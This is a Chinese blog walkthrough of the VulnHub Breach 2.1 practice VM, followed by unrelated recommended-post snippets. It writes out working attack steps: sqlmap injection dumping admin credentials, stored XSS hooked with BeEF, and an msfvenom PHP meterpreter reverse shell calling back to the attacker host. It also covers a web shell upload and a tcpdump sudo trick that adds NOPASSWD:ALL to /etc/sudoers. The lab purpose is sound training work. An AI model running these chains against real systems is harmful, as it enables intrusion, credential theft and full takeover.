Breach 2.1靶机

最新推荐文章于 2024-10-24 08:59:16 发布
最新推荐文章于 2024-10-24 08:59:16 发布
阅读量692 收藏 16
点赞数 25
文章标签: 网络安全 web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67480384/article/details/142350602
版权

网络配置

将kali与靶机都设置为仅主机模式,子网ip设为192.168.110.0网段

靶机的mac地址,设置为00:0C:29:00:0D:3B

一、信息收集

扫描靶机ip 
arp-scan -l

端口扫描

nmap -p- -A 192.168.110.151

尝试ssh连接

ssh root@192.168.110.151 -p 65535

发现得到用户名:Peter 密码:inthesource

尝试用peter用户进行连接,发现连接断开

 ssh peter@192.168.110.151 -p 65535

再次进行端口扫描,发现新开放了80端口

nmap -p- -A 192.168.110.151

浏览器访问80端口

目录扫描

dirsearch -u http://192.168.110.151/

访问http://192.168.110.151/blog

发现搜索框

搜索时有参数,测试是否存在sql注入

利用sqlmap工具测试

sqlmap -u "http://192.168.110.151/blog/index.php?search=11"

发现存在sql注入

查询数据库名

sqlmap -u "http://192.168.110.151/blog/index.php?search=11" --dbs

查询 oscommerce数据库下面的表

 sqlmap -u "http://192.168.110.151/blog/index.php?search=11" -D  oscommerce
 --tables

查看osc_administrators 表下的数据,发现用户名密码

sqlmap -u "http://192.168.110.151/blog/index.php?search=11" -D oscommerce -T osc_administrators --dump

对密码进行md5解密

二、Getshell

点击注册,注册账号

点击members出现弹窗,发现存在xss漏洞

kali安装beef-xss

注意:安装之前将kali调整到nat模式

apt install beef-xss
beef-xss

将红框中的数据,作为用户名,注册一个账号,将127.0.0.1替换为kali的地址

点击register 再点击members

kali访问

http://192.168.110.128:3000/ui/panel

发现靶机上线,发现火狐浏览器版本为15存在漏洞

发现每隔5秒会话会自动中断,需要迅速切换反弹shell为meterpreter

use post/multi/manage/shell_to_meterpreter
set session 1
run


sessions
sessions 2
shell
python -c 'import pty; pty.spawn("/bin/bash")'

三、milton用户提权

因为刚刚peter连接SSH时没成功,所以先看看SSH的配置文件,发现在文件尾写到登入peter时会运行/usr/bin/startme

查看对应文件内容,startme的作用是开启apache服务, 所以登录成功peter才开放80端口

cat /usr/bin/startme


cd /home
ls -al

检查网络状态,发现有2323端口在运行

netstat -tln

使用telnet连接端口,提示一个坐标位置29°45’46.0"N 95°22’59.0"W,基于坐标进行地图(map.google.com)查询发现为休斯顿的地址位置,使用账号milton登录,密码Houston尝试登录

用google查询 发现这个地点位于Houston,作为密码输入

用户名的话也就是之前/etc/passwd文件中的用户名

经尝试用户名为 milton

我们需要回答一个问题:这个订书机是谁的

cd /usr
grep -rno staple

发现一个 cd.py 文件 查看其内容

答案是mine

再次使用telnet连接2323端口,成功实现milton用户提权

发现 .profile 文件

四、blumbergh用户提权

再次查看网络信息,提示8888端口已经放开 
netstat -tln

访问8888端口,显示有2个页面,访问第一个页面会进入CMS中

使用dirsearch对其进行目录扫描

dirsearch -u http://192.168.110.151:8888/oscommerce/

拼接/admin/,出现了一个登录框

尝试弱口令进行登录admin admin,发现登录成功

存在可利用的点,在Tools发现了一个文件管理器

在include/work路径下上传木马,使用MSF生成反弹shell木马,并上传到服务器中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=9999 -f raw -o shell.php

将生成的shell.php上传到服务器上

MSF设置监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 9999
run


获取交互式shell,发现此时用户为blumbergh,依旧是低权限

shell
python -c "import pty;pty.spawn('/bin/bash')"


sudo -l 查看可运行的sudo命令

切换到 tmp 目录,构造1.sh 脚本文件以实现提权,然后执行GTOFbins中给出的 sudo 命令,实现脚本利用

cd /tmp
echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/test && chmod +x /tmp/test
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test -Z root
sudo su

提权成功

Sɪʟᴇɴᴛོ.498
关注
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3682
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
Breach 2.1 靶机
hqy250019的博客
08-01 435
telnet 127.0.0.1 2323,连接一下此端口,有个坐标,搜索发现这个坐标刚好是休斯顿(houston)的坐标。分析源码,问题答案是mine,如果在三秒内没有回答正确,就会杀死进程,那么再尝试登录并在3秒内输入mine,成功登录。由于注册时没有对输入的用户名进行防护,导致将构造的XSS语句存入了数据库,查看个人信息将会触发用户名的XSS语。看着像是http服务,用nmap再扫下端口,又多了个服务,8888端口有个http服务。目录,拼接admin,之前扫出来的admin,admin登录。
Breach-2.1靶机
m0_65285254的博客
08-02 461
sshd_config是客户端的ssh配置文件,在文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞。在配置文件中发现,mysql数据库的root用户并没有设置密码,所以我们可以直接登录数据库后台。开放端口三个,分别是111,40653,65535三个端口 没有80端口。查看/home/milton目录下的文件 发现 .profile 文件。
vulnhub-Breach 2.1靶机
wjSteve的博客
09-18 745
网站存在一个搜索框,看到这个一般就会考虑XSS或者搜索型SQL注入,尝试发现确实存在SQL注入(输入单引号会导致不输出结果条数,正常至少输出一个0)输入密码之后直接关闭连接,和之前做的一个靶机非常像,但是没有弹出错误提示说明密码正确,尝试指定/bin/bash也不起作用,再次收集端口信息。弹出了一段信息,比较有用的是第四行,给出了peter账户,并且有一个灯下黑的密码"inthesource"给出了一个坐标,经查询是Houston(休士顿,我们遇到麻烦了),估计是个密码(毕竟这里已经显示让登录了)
Breach 2.1靶机渗透
weixin_67832625的博客
10-11 644
sshd_config是客户端的ssh配置文件,在文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。上传成功后访问http://192.168.110.151:8888/oscommerce/includes/work/1.php。提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞。访问:http://192.168.110.128:3000/ui/panel,可以看到Kali和靶机都已上线。
Breach 2.1靶机打靶记录
qq_64703089的博客
09-24 1137
Breach 2.1靶机,打靶过程挺长的。
Breach: 2.1 靶机 - 详细流程
m0_73983897的博客
10-07 1058
流程:主机发现 - 信息收集 - Web渗透 - 获取shell - 权限提升 信息收集:端口扫描立大功,归功于靶机的脑洞比较大,访问特定服务后才会开启另一个服务,在今后的测试中也需要分阶段性地进行端口扫描;Web渗透一般存在SQL注入 的功能点大多都存在XSS漏洞,而且XSS漏洞既然存在就一定不止一个;XSS漏洞(存储型)+ 浏览器漏洞 获取shell,在靶机中比较少见,但也需要注意;MSF 中要注意区分使用session和sessions的命令,有时候多打一个s就浪费一上午时间;
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1347
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach-2.1
weixin_44770698的博客
03-10 788
靶场练习-60
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
breach靶机
Encild的博客
11-09 452
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4412
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1216
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8523
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
构建安全基石:网络安全等级保护定级指南
最新发布
w13359990065的博客
10-24 400
通过上述分析,我们可以看出,构建安全基石:网络安全等级保护定级指南精要,不仅提供了系统性的安全防护框架,更为企业提供了明确的实施路径。企业应充分理解定级指南的核心要素,结合自身实际,灵活应用技术防护与管理措施,确保网络安全防护的全面性和有效性,从而在激烈的市场竞争中保持安全稳定的发展态势。网络安全等级保护定级是构建企业网络安全基石的关键步骤,它不仅帮助企业明确安全防护的重点,还指导企业实施有效的安全措施,提升整体安全防护能力。综合业务属性、风险评估和安全需求,经过专家评审,确定信息系统的最终安全等级。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-22 941
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
软考(网工)——网络安全
2301_80093566的博客
10-18 1235
公钥密码又称为非对称加密,就是对数据加密和解密的密钥是不同的。密钥分发方便、密钥保管量少、支持数字签名。加密速度慢(计算量大,不适合加密大数据)、数据膨胀率高。公钥公开,私钥自己保存。公钥加密,私钥解密,可实现保密通信私钥加密,公钥解密,可实现数字签名常见的非对称加密算法如下:RSA:512位(或1024位)密钥,计算量极大,难破解。Elgamal、ECC(椭圆曲线算法)、背包算法、Rabin、DH等。网络攻击分类:主动和被动。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-23 1632
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Breach-2_final2.1_xss挑战上线:实战演示与攻防策略
在"一起打靶-Breach-2_final2.1.xss上线"这个挑战中,Breach-2.0 是一个实战型的Boot2Root/CTF(Capture The Flag)游戏,它的目标是通过一系列的真实世界场景和意想不到的转折来展示安全攻击和防御的过程。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值